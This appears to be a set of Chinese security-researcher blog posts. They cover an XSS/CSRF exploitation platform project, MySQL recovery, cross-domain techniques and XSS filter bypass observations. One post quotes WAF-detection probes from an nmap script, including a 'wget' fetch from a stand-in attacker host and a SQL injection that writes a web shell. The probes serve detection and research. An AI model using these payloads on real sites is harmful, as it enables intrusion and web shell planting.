目标:超越已知的XSS利用平台(XSS Shell, BeEF, Anehta, CAL9000等),集大成者,快了,快了。

架构清晰,扩展容易。还是用自己的东西比较放心,自己完全打造有种优越感。先告一段落吧,本来是作为我那本书的一个附赠之物,可是发现已经不合适了,会引来不必要的麻烦。

因为自己的时间实在太紧,但是还是抽出时间来一步步完善这个,所以进度慢的很。
下一步继续完善各种细节(我爱深抠细节),并加入更多各种HTML5特性支持。

这个平台的名字我早就取好名了:web2ghost
就像是潜伏在你浏览器周围的鬼魂,看不见,可威胁却在持续……这个平台极大地方便我们进行XSS&CSRF等基于Web前端的漏洞利用。
Django&Python&MySQL&jQuery构建。
Continue reading

我这几天老扯谈这些东西。

我总跟团队的人说方法论,研究东西一定要形成一套自己的方法论。这个神奇的东西能指导你在之后的“重复”工作中大大提高效率,并且不会总想着去依赖别人。方法论形成的容易程度与平常积累有关系,基础扎实有关系。这种东西只可意会,不可言传,而且不可多说,所以打住,我不说了。这个话题结束……

EOF.

说下《跨站之路》(已更名为《Web前端黑客技术揭秘》)吧,看到圈内一些朋友在帮忙推荐,我的压力这个瞬间大了,今年眨眼就过去了。《跨站之路》(已更名为《Web前端黑客技术揭秘》)是我走的路,我的点滴积累,少不了圈内朋友们的分享与影响。而其实每个人都有自己的路,自己的积累。所以谁都可以写这样的书。

在知道创宇快4年了。也许应该是一个时代的终结,所以我在终结各种东西(包括写书这样费心的事),我看到heart在微博的感慨,圈内的微妙变化,我曾说过自己不会变,看我博客右边的“关于我”里的描述吧。

EOF.

创宇的几个兄弟也喜欢谈思维模式,思维模式很重要,能影响一个人对一件事的思考、决策与结果。牛人们,都有一套优秀的思维模式。如果连自己的思维模式都不清晰的人,不会有更好的发展。思维模式的几个重要因子:全局、必要时的开放、聚焦、进化。缺乏这些,那么这人不会有什么成就。

太广泛而争议的话题,赶紧EOF!自己思索去吧!最近我在忙coding&writing。

大家估计都在关心(如果有在关心的话)这几点:
1、真的超光速了吗?
2、超光速后狭义相对论岂不是错了?
3、这个错的话,岂不是很多基于这理论的要坍塌了?
4、中微子到底是啥玩意?
5、那个实验靠谱不?
6、这对我们有何影响?

看这吧:http://songshuhui.net/archives/60161,科学松鼠会这篇收集里汇集了各位的问题了。我就懒得科普什么了。不过还是得说点什么。
Continue reading

mysql库,总算恢复成功了。由于总总原因导致要恢复前些天备份的数据库文件(.sql),27G大小。

但是碰到几个问题:

1、mysql -uroot -p mydbmyisam_sort_buffer_size = 1024M
myisam_max_sort_file_size = 30G # 导入大sql文件时

我的数据库的myisam引擎支持的。其它的差不多这个思路,我没实战,自己探索去吧。这样配置好,重启mysql,然后再次备份就成功了。

2、期间还发现一些问题,这些问题可以通过mysql的错误日志文件具体查明与定位到,这些错误日志文件在my.cnf有配置路径。查日志文件是解决问题的一个非常重要的思路。如果找不到这样的日志文件,可以试试linux下的lsof -c mysql进行寻找。

反正方法多多。

https://github.com/colorhook/crossdomain,源码。

还有一群程序员在讨论这些:http://www.iteye.com/topic/897253,我忘记是knownsec谁或者其他人分享我的了。总结还不错。还有一些,比如html5里牛逼的websocket技术,直接跨域,持久连接,在客户端层面html5的postMessage已经很帅了。这些本是为了满足程序员欲望的hacking,也满足了我们更邪恶的hacking。。

如果要说还有一些跨域的,那就是各位牛手里的0day了。

麻烦而有意思,最近好像经常在接触这一问题。

一个人的思考层面能很大影响一个人的未来形态。很多事别人认为你完成不了,你不是谁谁谁的时候,本来就不应该是谁谁谁。不用过多口水。我们需要一个牛人的姿态:给我一个支点,我能翘起地球。

http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse

测试了下有个bug会引起执行失败:

“?p4yl04d=<img src=”x” alt=”” />”, “?p4yl04d=wget http://ev1l.com/xpl01t.txt”
“?p4yl04d=UNION SELECT ”,2,3 INTO OUTFILE ‘/var/www/w3bsh3ll.php’ –“}

改为

“?p4yl04d=<img src=”x” alt=”” />”, “?p4yl04d=wget http://ev1l.com/xpl01t.txt”,
“?p4yl04d=UNION SELECT ”,2,3 INTO OUTFILE ‘/var/www/w3bsh3ll.php’ –“}

少一个逗号- -。

效果出来了,原理很简单,部署WAF的网站,发送一些网站本身不包含的一些参数键值对,网站一般情况下不会出现任何异常,而WAF会报警,响应会出现差异。基于这些差异进行判断就行。不过这个nse脚本判断机制似乎太简单了。

前几天knownsec sogili同学发现ie xss filter一个有意思的bypass,又是一种差异性导致的xss,这次是服务端语言的问题。除了这个,ie还有一个特性,判断origin是否来自本域,是的话,xss filter无效。

昨天研究下chrome xss filter,和ie的机制不太一样,表面看是不做替换,这只是表象而已,实际上chrome会对响应回的HTML做一次规范化,这个过程会判断get请求是否有潜在的xss exp,如果有,输出规范化就会做出各种过滤修改等。只是你直接查看源码是看不到的,可以配合F12,好好看看规范化之后的行为,这个技巧对于我们进行漏洞挖掘非常有利。

除了chrome F12可以看到真实的HTML,其他浏览器呢?通过DOM技巧就行:

javascript:alert(document.getElementsByTagName(‘body’)[0].innerHTML)

这样有什么好处?有利于我们判断浏览器的规范化行为,并进一步找出规范化差异或bugs,也许一个能bypass很多网站过滤器的exp就这样被我们找到,这个过程其实是可以写成一个基于浏览器的fuzzing工具的:P
Continue reading

接手Web扫描器我发现有11个月了,新的架构是我在今年4月写出来的,到现在几乎快半年,这个架构目前让我很放心,插件化非常简单,各层数据流很清晰。然后忙各种事,信口答应可以超越ibm appscan,可是扫描器定位不一样,虽然大家共识是这样,可我还是很不满意,比如我不满意爬虫,不满意各个核心的漏洞检测插件,还未真的高潮,我就要放手去做防御了。

也好,让我脱离出各种琐事,各种宏观上的(如架构、框架)。我可以花更多精力深入核心去做研究,这样我也许能逐步加强各种规则+核心插件,预研一些更高端的技术。

这些需要勇气。做吧。今天防御组在公司加班学习。:P对了,我这个博客转移到更快的空间了,thx knownsec.